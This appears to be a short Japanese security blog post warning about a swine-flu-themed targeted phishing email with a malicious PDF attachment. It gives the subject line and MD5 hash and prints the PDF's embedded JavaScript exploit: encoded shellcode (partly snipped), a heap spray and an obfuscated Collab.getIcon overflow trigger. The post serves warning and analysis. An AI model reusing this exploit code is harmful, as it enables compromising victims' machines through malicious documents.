新型インフルエンザをテーマにした標的型攻撃に関して。

Malicious PDF といえば、JSRedir-R(通称Genoウイルス)でも使われるなど、今旬な攻撃ですね。

他の手口では、先週私のボス宛のメールに添付されていました。内容は豚インフルエンザのネタの標的型メールです。カタコトの日本語の標題なのでそうそうクリックする人はいないと思いますが、一応注意しておく必要がありそうです。

Subject: 病人の行動路線,こ?注意なさい
MD5: 9137fec2f6a1b020cd877cebce8b8f67

ちなみに、添付されていたPDFに含まれるコードは次のようなものでした。

Exploitされますと、中国のサイトへ飛んでいきます。(´;ω;`)
var sc = unescape("%u5850%u5850%uEB90%u4022%u5A48%u5F52%u8B66%u800A"+ "%u30F9%u1A74%uE980%uC064%u04E1%uED80%u8064%u0FE5"+ "%uCD02%u0F88%u4242%uEB47%uE8E3%uFFD9%uFFFF"+

--- snip ---

"%u6F6C%u6864%u6F6C%u6764%u6970%u6F72%u6664%u6767"+ "%u6470%u6F6C%u6971%u7369%u7269%u7169%u6F69%u6670"+ "%u6C64%u6464%u6C72%u6464%u6464%u6464%u6464%u6C69"+ "%u676C%u6470%u6964%u6770%u3030"); function repeat(count,what){ var v = ""; while (--count >= 0) v += what; return v; } function myunescape(buf) { var ret=''; for (var x=0;x < buf.length; x+=2) { ret += util.byteToChar(Number('0x'+buf.substr(x,2))); } return ret; } function exploit() { blah = repeat(128, unescape("%u4141%u4141%u4141%u4141%u4141")) + sc; bigblock = unescape("%u4141%u4141"); headersize = 20; wap = headersize+blah.length; while (bigblock.length<0x40000) block = block+block+fillblock; mm = new Array(); for (i=0;i<200;i++) mm[i] = block + blah; of = repeat(4096, myunescape("0a0a0a0a")); var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]); } var inBrowser = this.external; if (inBrowser) var shaft = app.setTimeOut("exploit()",1200); else exploit();